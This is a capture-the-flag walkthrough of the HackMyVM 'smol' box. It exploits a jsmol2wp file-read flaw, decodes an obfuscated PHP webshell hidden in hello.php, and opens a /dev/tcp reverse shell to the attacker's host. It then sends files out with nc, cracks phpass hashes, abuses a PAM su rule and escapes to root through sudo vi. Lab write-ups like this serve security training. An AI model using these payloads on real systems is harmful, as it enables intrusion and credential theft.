HackMyVM: smol Box Walkthrough (WP)
城南花已开 Lv5

Information Gathering

Service Discovery

The scan shows only 22 (ssh) and 80 (http) open. The site on port 80 has to be reached by its hostname, so add an entry for it to /etc/hosts (www.smol.hmv is used in the later commands).

❯ ip=192.168.56.112
❯ rustscan -a $ip |tee scan.txt
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.112:22
Open 192.168.56.112:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-11 14:46 CST
Initiating Ping Scan at 14:46
Scanning 192.168.56.112 [4 ports]
Completed Ping Scan at 14:46, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:46
Completed Parallel DNS resolution of 1 host. at 14:46, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:46
Scanning 192.168.56.112 [2 ports]
Discovered open port 22/tcp on 192.168.56.112
Discovered open port 80/tcp on 192.168.56.112
Completed SYN Stealth Scan at 14:46, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.56.112
Host is up, received echo-reply ttl 63 (0.00056s latency).
Scanned at 2024-12-11 14:46:29 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)

Browsing to it shows a WordPress site, so run wpscan against it.

The WordPress install uses a plugin called jsmol2wp:

❯ wpscan --url www.smol.hmv
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://www.smol.hmv/ [192.168.56.112]
[+] Started: Wed Dec 11 15:12:55 2024

Interesting Finding(s):

................(omitted)..................

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] jsmol2wp
| Location: http://www.smol.hmv/wp-content/plugins/jsmol2wp/
| Latest Version: 1.07 (up to date)
| Last Updated: 2018-03-09T10:28:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.07 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=======================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Dec 11 15:12:57 2024
[+] Requests Done: 188
[+] Cached Requests: 5
[+] Data Sent: 45.729 KB
[+] Data Received: 21.913 MB
[+] Memory used: 283.352 MB
[+] Elapsed time: 00:00:02

Searching for the plugin name and version turns up an arbitrary file read vulnerability: a php://filter/resource=../../../../<file> wrapper passed in the query parameter of php/jsmol.php returns the raw contents of any file the web server user can read (the exact URL is the one used in the ffuf command further down).

Find the PoC and give it a quick try.

Reading wp-config.php this way gives the database credentials: user wpuser, password kbLSF2Vop#lw3rjDZ629*Z%G. The same password is reused for the wpuser WordPress account.
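As an added example (not code from the original post), the following Python helper builds the file-read URL for the jsmol2wp endpoint used on this box and pulls the define('DB_*', ...) values out of a wp-config.php. The wp-config.php text is a constructed sample built around the credentials found above; the helper names (lfi_url, parse_wp_config) and the traversal depth of four (php -> jsmol2wp -> plugins -> wp-content -> WordPress root) are assumptions for this box's layout.

```python
import re
from urllib.parse import quote

# Endpoint and fixed parameters as they appear in the ffuf command on this page.
JSMOL_PATH = "/wp-content/plugins/jsmol2wp/php/jsmol.php"
FIXED_QUERY = "isform=true&call=getRawDataFromDatabase&query="


def lfi_url(base: str, target: str, depth: int = 4) -> str:
    """Build the file-read URL for `target`, a path relative to the WordPress root.

    `depth` (assumption for this box) is how many ../ climb from php/ back to the
    document root. The php://filter wrapper with only a resource= part returns the
    file verbatim, which is what the page's ffuf run relied on.
    """
    traversal = "../" * depth + target.lstrip("/")
    payload = "php://filter/resource=" + traversal
    return f"{base.rstrip('/')}{JSMOL_PATH}?{FIXED_QUERY}{quote(payload, safe='/:=')}"


# define( 'KEY', 'value' ); with either quote style and optional whitespace.
DEFINE_RE = re.compile(
    r"""define\(\s*(['"])(?P<key>[A-Za-z_][A-Za-z0-9_]*)\1\s*,\s*(['"])(?P<val>.*?)\3\s*\)\s*;"""
)


def parse_wp_config(src: str) -> dict[str, str]:
    """Return every define('KEY', 'value') pair found in wp-config.php source."""
    return {m.group("key"): m.group("val") for m in DEFINE_RE.finditer(src)}


def db_credentials(src: str) -> tuple[str, str, str]:
    """(DB_USER, DB_PASSWORD, DB_HOST) from wp-config.php source, or KeyError if absent."""
    cfg = parse_wp_config(src)
    return cfg["DB_USER"], cfg["DB_PASSWORD"], cfg["DB_HOST"]


# Constructed sample of the relevant part of a wp-config.php (not the file from the box).
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );
define( 'DB_HOST', 'localhost' );
define( 'AUTH_KEY', 'put your unique phrase here' );
$table_prefix = 'wp_';
"""

if __name__ == "__main__":
    print(lfi_url("http://www.smol.hmv", "wp-config.php"))
    print(db_credentials(SAMPLE_WP_CONFIG))
```

Fetching the URL with curl or requests and feeding the body to parse_wp_config is the only step left; the parser is what saves time when the response is a long file with the credentials buried in it.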

Log in at wp-login.php with it; this user is not an administrator.

Among the Pages there is one written as a task list for the web administrator.

It is about a plugin called Hello Dolly. Judging from the text, that plugin very likely contains a backdoor, so we fuzz for plugin files through the file-read vulnerability:

❯ ffuf -ic -c -u 'http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../FUZZ' -w /usr/share/seclists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt  -fs 2

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 2
________________________________________________

wp-content/plugins/hello.php [Status: 200, Size: 2704, Words: 321, Lines: 104, Duration: 7ms]
:: Progress: [13370/13370] :: Job [1/1] :: 427 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

The plugin is indeed present under wp-content/plugins (hello.php). Read its source with the same vulnerability.

In the source, the hello_dolly() function starts with an eval() of a base64-encoded string:

function hello_dolly() {
eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));

$chosen = hello_dolly_get_lyric();
$lang = '';
if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
$lang = ' lang="en"';
}

printf(
'<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
__( 'Quote from Hello Dolly song, by Jerry Herman:' ),
$lang,
$chosen
);
}

Decoded, it is a one-line webshell. The octal and hex escapes in the $_GET key both resolve to cmd (I also checked with GPT):
if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); } 

printf on Kali expands the same escapes:
printf "\143\x6d\144"
cmd
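Added example (not code from the original post): the following Python base64-decodes the payload quoted above, applies PHP's double-quoted-string escape rules (\ooo octal, \xHH hex and the usual \n, \t, \\, \$, \"), and lists which $_GET/$_POST/$_REQUEST/$_COOKIE keys the decoded code reads. This is how you get the parameter name without executing anything from the plugin. The function names are mine.

```python
import base64
import re

# The base64 string exactly as it appears in the eval() inside hello_dolly() above.
PAYLOAD_B64 = (
    "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA="
)

# Escapes PHP honours inside a double-quoted string: \xHH, \ooo and a few single letters.
_ESC = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$\"])")
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b", "f": "\f",
           "\\": "\\", "$": "$", '"': '"'}


def php_unescape(s: str) -> str:
    """Resolve PHP double-quoted-string escapes, e.g. r'\\143\\155\\x64' -> 'cmd'."""
    def repl(m: re.Match) -> str:
        e = m.group(1)
        if e[0] == "x":
            return chr(int(e[1:], 16))
        if e[0] in "01234567":
            return chr(int(e, 8) & 0xFF)   # PHP truncates octal escapes to one byte
        return _SIMPLE[e]
    return _ESC.sub(repl, s)


_SUPERGLOBAL = re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\[\s*(["\'])(.*?)\1\s*\]')


def superglobal_keys(php_src: str) -> set[str]:
    """Decoded key names the code reads from request superglobals.

    Single-quoted PHP strings do not process \\ooo or \\xHH, so only double-quoted
    keys are unescaped.
    """
    keys = set()
    for m in _SUPERGLOBAL.finditer(php_src):
        quote, raw = m.group(1), m.group(2)
        keys.add(php_unescape(raw) if quote == '"' else raw)
    return keys


def decode_backdoor(b64: str) -> tuple[str, set[str]]:
    """Return (decoded PHP source, parameter names it reads)."""
    src = base64.b64decode(b64).decode("utf-8", "replace")
    return src, superglobal_keys(src)


if __name__ == "__main__":
    src, keys = decode_backdoor(PAYLOAD_B64)
    print(src)
    print("request parameters used:", keys)   # {'cmd'}
```

Obfuscating the key name with octal/hex escapes is exactly what defeats a plain grep for "cmd" or "system(" through the plugin directory; grepping for eval(base64_decode( is the more reliable signature.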

The plugin's description reads: "When activated you will randomly see a lyric from Hello, Dolly in the upper right of your admin screen on every page."

So once the plugin is active, hello_dolly() runs on every wp-admin page, and appending a cmd parameter to any wp-admin URL while logged in executes the command as the web server user.

┌──(kali㉿kali)-[~]
└─$ vim rev.sh
sh -i 5<> /dev/tcp/192.168.56.102/4444 0<&5 1>&5 2>&5
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.112 - - [11/Dec/2024 03:08:52] "GET /rev.sh HTTP/1.1" 200 -

Other commands showed no output in the page, so I wrote a reverse shell script locally, served it with python3 -m http.server, and had the target wget it and run it.

The reverse shell connects back as www-data:

┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
id
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.112] 41714
sh: 0: can't access tty; job control turned off
$ uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ /usr/bin/script -qc /bin/bash 2>/dev/null
www-data@smol:/var/www/wordpress/wp-admin$

There is a backup file in /opt; transfer it to Kali with nc:

www-data@smol:/opt$ ls
ls
wp_backup.sql
www-data@smol:/opt$ which nc
which nc
/usr/bin/nc
www-data@smol:/opt$ nc 192.168.56.102 4444 <wp_backup.sql
nc 192.168.56.102 4444 <wp_backup.sql
——————————————————————————————————————
┌──(kali㉿kali)-[~]
└─$ nc -lvp 4444 > wp_backup.sql
listening on [any] 4444 ...
192.168.56.112: inverse host lookup failed: Unknown host
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.112] 51170

Searching the SQL dump for the keyword wpuser and formatting the INSERT gives the user table.

The same data can also be queried by logging into MySQL with the wpuser credentials. Only the admin hash differs between the live database and the backup; all the other rows are identical.

www-data@smol:/home$ mysql -u wpuser -p
mysql -u wpuser -p
Enter password: kbLSF2Vop#lw3rjDZ629*Z%G

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 324
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2024, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
| ID | user_login | user_pass                          | user_nicename | user_email         | user_url            | user_registered     | user_activation_key | user_status | display_name           |
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
|  1 | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0 | admin         | [email protected]  | http://www.smol.hmv | 2023-08-16 06:58:30 |                     |           0 | admin                  |
|  2 | wpuser     | $P$BfZjtJpXL9gBwzNjLMTnTvBVh2Z1/E. | wp            | [email protected]  | http://smol.thm     | 2023-08-16 11:04:07 |                     |           0 | wordpress user         |
|  3 | think      | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/ | think         | [email protected]  | http://smol.thm     | 2023-08-16 15:01:02 |                     |           0 | Jose Mario Llado Marti |
|  4 | gege       | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1 | gege          | [email protected]  | http://smol.thm     | 2023-08-17 20:18:50 |                     |           0 | gege                   |
|  5 | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1 | diego         | [email protected]  | http://smol.thm     | 2023-08-17 20:19:15 |                     |           0 | diego                  |
|  6 | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN/ | xavi          | [email protected]  | http://smol.thm     | 2023-08-17 20:20:01 |                     |           0 | xavi                   |
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
6 rows in set (0.00 sec)

Crack them with hashcat in mode 400 (phpass). The other users' hashes take much longer (gege's is cracked later, in the root section); diego's falls within minutes, password sandiegocalifornia:

❯ hashcat -a 0 -m 400 hash /usr/share/wordlists/rockyou.txt

$P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1:sandiegocalifornia

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 400 (phpass)
Hash.Target......: $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1
Time.Started.....: Wed Dec 11 16:33:27 2024 (4 mins, 23 secs)
Time.Estimated...: Wed Dec 11 16:37:50 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4999 H/s (6.24ms) @ Accel:256 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1316864/14344385 (9.18%)
Rejected.........: 0/1316864 (0.00%)
Restore.Point....: 1315840/14344385 (9.17%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:7936-8192
Candidate.Engine.: Device Generator
Candidates.#1....: sangitarai -> sanabi

Started: Wed Dec 11 16:33:10 2024
Stopped: Wed Dec 11 16:37:51 2024

User Privilege Escalation

su to diego and read the user flag:

www-data@smol:/var/www/wordpress/wp-admin$ su diego
su diego
Password: sandiegocalifornia
diego@smol:/var/www/wordpress/wp-admin$ cd ~
cd ~
diego@smol:~$ ls
ls
user.txt
diego@smol:~$ cat user.txt
cat user.txt
45edaec653ff9ee06236b7ce72b86963

Looking for anything else of value: no interesting SUID binaries and no sudo rights.

The other users' home directories are readable by the internal group, and diego is a member of internal:

diego@smol:/home$ ls -al
ls -al
total 24
drwxr-xr-x 6 root root 4096 Aug 16 2023 .
drwxr-xr-x 18 root root 4096 Mar 29 2024 ..
drwxr-x--- 2 diego internal 4096 Aug 18 2023 diego
drwxr-x--- 2 gege internal 4096 Aug 18 2023 gege
drwxr-x--- 5 think internal 4096 Jan 12 2024 think
drwxr-x--- 2 xavi internal 4096 Aug 18 2023 xavi
diego@smol:/home$ id
id
uid=1002(diego) gid=1002(diego) groups=1002(diego),1005(internal)
diego@smol:/home$ ls -al *
ls -al *
diego:
total 24
drwxr-x--- 2 diego internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 diego diego 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 diego diego 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 diego diego 807 Feb 25 2020 .profile
-rw-r--r-- 1 root root 33 Aug 16 2023 user.txt
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null

gege:
total 31532
drwxr-x--- 2 gege internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 gege gege 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 gege gege 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege 32266546 Aug 16 2023 wordpress.old.zip

think:
total 32
drwxr-x--- 5 think internal 4096 Jan 12 2024 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think 220 Jun 2 2023 .bash_logout
-rw-r--r-- 1 think think 3771 Jun 2 2023 .bashrc
drwx------ 2 think think 4096 Jan 12 2024 .cache
drwx------ 3 think think 4096 Aug 18 2023 .gnupg
-rw-r--r-- 1 think think 807 Jun 2 2023 .profile
drwxr-xr-x 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null

xavi:
total 20
drwxr-x--- 2 xavi internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 xavi xavi 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 xavi xavi 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 xavi xavi 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null

gege's home holds a backup archive we cannot read (it is root:gege, mode 750), and think's home has a world-readable .ssh directory, so check it for a private key.

There is one. Copy it to Kali and SSH in as think:

❯ vim id_rsa
❯ chmod 600 id_rsa
❯ ssh think@$ip -i id_rsa
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed 11 Dec 2024 05:11:22 PM UTC

System load: 0.09 Processes: 218
Usage of /: 55.7% of 9.75GB Users logged in: 0
Memory usage: 43% IPv4 address for enp0s17: 192.168.56.112
Swap usage: 0%


Expanded Security Maintenance for Applications is not enabled.

162 updates can be applied immediately.
125 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

think@smol:~$

The backup archive still can't be read, but checking groups shows that think and gege are both in the dev group. Does the system allow switching between them without a password?

Look at /etc/pam.d/su:

think@smol:~$ cat /etc/pam.d/su
#
# The PAM configuration file for the Shadow `su' service
#

# This allows root to su without passwords (normal operation)
auth sufficient pam_rootok.so
auth [success=ignore default=1] pam_succeed_if.so user = gege
auth sufficient pam_succeed_if.so use_uid user = think

The configuration lets think su to gege without a password. The pam_succeed_if line with [success=ignore default=1] checks the target user: if it is gege the result is ignored and the stack continues, otherwise the next line is skipped. The following line is marked sufficient and, because of use_uid, checks the calling user: if that is think, authentication is complete without ever reaching the password prompt.
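Added example (not code from the original post): a minimal evaluator for the three auth lines above, implementing only the control-flag semantics that matter here (sufficient means success=done default=ignore; [success=ignore default=1] means do nothing on success and skip the next module on failure). Module behaviour is modelled only for pam_rootok.so and pam_succeed_if.so with a user = NAME condition, with or without use_uid. The rest of the real file, which would prompt for a password, is not shown on the page, so falling off the end of the stack is reported as "password required" (False).

```python
import re

# The auth lines from /etc/pam.d/su quoted above.
PAM_SU_AUTH = """\
auth sufficient pam_rootok.so
auth [success=ignore default=1] pam_succeed_if.so user = gege
auth sufficient pam_succeed_if.so use_uid user = think
"""

# type  control-or-[bracketed control]  module  args...
_LINE = re.compile(r"^\s*(\S+)\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")


def _control_actions(control: str) -> dict[str, str]:
    """Map a control field to {'success': action, 'default': action}.

    Simplification: a real 'sufficient' only ends the stack if no earlier
    'required' module failed; there is none in the lines modelled here.
    """
    if control == "sufficient":
        return {"success": "done", "default": "ignore"}
    m = re.fullmatch(r"\[(.*)\]", control)
    if not m:
        raise NotImplementedError(f"control flag not modelled: {control}")
    return dict(kv.split("=", 1) for kv in m.group(1).split())


def _module_succeeds(module: str, args: list[str], caller: str, target: str) -> bool:
    if module == "pam_rootok.so":
        return caller == "root"                     # root may su anywhere
    if module == "pam_succeed_if.so":
        use_uid = "use_uid" in args
        field, op, value = [a for a in args if a != "use_uid"]
        if field != "user" or op not in ("=", "!="):
            raise NotImplementedError(f"condition not modelled: {args}")
        subject = caller if use_uid else target     # use_uid tests the *calling* user
        return (subject == value) if op == "=" else (subject != value)
    raise NotImplementedError(f"module not modelled: {module}")


def su_without_password(caller: str, target: str, config: str = PAM_SU_AUTH) -> bool:
    """True if the auth stack is satisfied before any password-prompting module."""
    stack = []
    for line in config.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _LINE.match(line)
        stack.append((m.group(2), m.group(3), m.group(4).split()))
    i = 0
    while i < len(stack):
        control, module, args = stack[i]
        ok = _module_succeeds(module, args, caller, target)
        action = _control_actions(control)["success" if ok else "default"]
        if action == "done":
            return True
        i += 1 + int(action) if action.isdigit() else 1   # numeric action = skip N modules
    return False


if __name__ == "__main__":
    for pair in (("think", "gege"), ("diego", "gege"), ("think", "xavi"), ("root", "xavi")):
        print(pair, su_without_password(*pair))
```

The asymmetry is worth noticing: the rule is keyed on both ends, so gege cannot su back to think, and think cannot reach xavi. Any other pair falls through to the normal password check.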

think@smol:~$ su gege
gege@smol:/home/think$ cd ~
gege@smol:~$ ls
wordpress.old.zip
gege@smol:~$ nc 192.168.56.102 4444 <wordpress.old.zip
————————————————————————————————————————————
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 4444>wordpress.old.zip
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.112] 54622
┌──(kali㉿kali)-[~]
└─$ file wordpress.old.zip
wordpress.old.zip: Zip archive data, at least v1.0 to extract, compression method=store

┌──(kali㉿kali)-[~]
└─$ unzip wordpress.old.zip
Archive: wordpress.old.zip
creating: wordpress.old/
[wordpress.old.zip] wordpress.old/wp-config.php password:

Root Privilege Escalation

Extraction needs a password. gege's WordPress password, cracked from the hash earlier (about 25 minutes according to hashcat), is [email protected], and it opens the archive.

Alternatively, attacking the zip archive directly would probably be much faster than cracking the phpass hash.

❯ hashcat -a 0 -m 400 hash_gege /usr/share/wordlists/rockyou.txt
$P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1:[email protected]

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 400 (phpass)
Hash.Target......: $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1
Time.Started.....: Wed Dec 11 16:41:24 2024 (25 mins, 3 secs)
Time.Estimated...: Wed Dec 11 17:06:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 5074 H/s (6.25ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7622656/14344385 (53.14%)
Rejected.........: 0/7622656 (0.00%)
Restore.Point....: 7620608/14344385 (53.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:8064-8192
Candidate.Engine.: Device Generator
Candidates.#1....: herrymon -> hermoxadoriannita

Started: Wed Dec 11 16:41:24 2024
Stopped: Wed Dec 11 17:06:28 2024

The wp-config.php inside the backup holds xavi's password, P@ssw0rdxavi@. su to xavi, and sudo -l shows xavi may run vi on /etc/passwd as root.

So escalate through vi: inside the editor type :set shell=/bin/sh and then :shell to drop into a root shell.

You could also simply edit /etc/passwd itself, since that is the file sudo lets you open. I was fixated on the shell escape and forgot the file can be modified directly 😅

Delete the x so that root:x:0:0:root:/root:/usr/bin/bash becomes root::0:0:root:/root:/usr/bin/bash, save, and su root with no password. The meaning of each field is listed at the end.

gege@smol:~$ su xavi
Password:
xavi@smol:/home/gege$ sudo -l
[sudo] password for xavi:
Matching Defaults entries for xavi on smol:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User xavi may run the following commands on smol:
(ALL : ALL) /usr/bin/vi /etc/passwd
xavi@smol:/home/gege$ sudo /usr/bin/vi /etc/passwd


Press ENTER or type command to continue
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
bf89ea3ea01992353aef1f576214d4e4
  1. root
    • The user name: the account name used to identify the user at login.
  2. x
    • An x means the password lives in /etc/shadow. Passwords used to be stored directly in /etc/passwd; modern Linux systems keep them in /etc/shadow for security and leave an x as a placeholder. The real password hash is on the matching line of /etc/shadow.
  3. 0
    • The user ID (UID), the unique identifier the system assigns to the user. UID 0 is the superuser (root), so this account has administrator rights.
  4. 0
    • The group ID (GID) of the user's primary group. GID 0 is the root group, so this user's primary group is root.
  5. root
    • The GECOS field, usually the full name or other descriptive information about the user; here it simply repeats the user name.
  6. /root
    • The home directory, the default working directory the user lands in after login. /root is root's home.
  7. /bin/bash
    • The login shell, the program started after login; here /bin/bash.
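The passwd edit works because an empty second field means no password is required at login. As the detection counterpart, here is an added example (not from the original post) of a small audit over a passwd-format file that flags exactly what this trick and its cousins leave behind: an empty password field, a password hash kept in passwd instead of shadow, and any uid 0 account other than root. The sample file is constructed; the function names are mine.

```python
from dataclasses import dataclass


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> tuple[list[PasswdEntry], list[int]]:
    """Parse passwd-format text. Returns (entries, line numbers that are malformed)."""
    entries, bad = [], []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7 or not f[2].isdigit() or not f[3].isdigit():
            bad.append(n)
            continue
        entries.append(PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6]))
    return entries, bad


def audit_passwd(text: str) -> list[str]:
    """Human-readable findings; an empty list means nothing suspicious."""
    entries, bad = parse_passwd(text)
    findings = [f"line {n}: malformed entry (expected 7 colon-separated fields)" for n in bad]
    for e in entries:
        if e.passwd == "":
            findings.append(f"{e.name}: empty password field, login requires no password")
        elif e.passwd != "x" and not e.passwd.startswith(("!", "*")):
            # 'x' = shadowed, '!'/'*' = locked; anything else is a hash in the wrong file
            findings.append(f"{e.name}: password hash kept in passwd instead of shadow")
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: uid 0 account other than root")
    return findings


# Constructed sample: root with the password field blanked (the trick above) and
# an extra uid 0 account carrying a hash directly in the file. Not from the box.
SAMPLE_PASSWD = """\
root::0:0:root:/root:/usr/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
xavi:x:1004:1004::/home/xavi:/bin/bash
toor:$6$saltsalt$notarealhashjustasample:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

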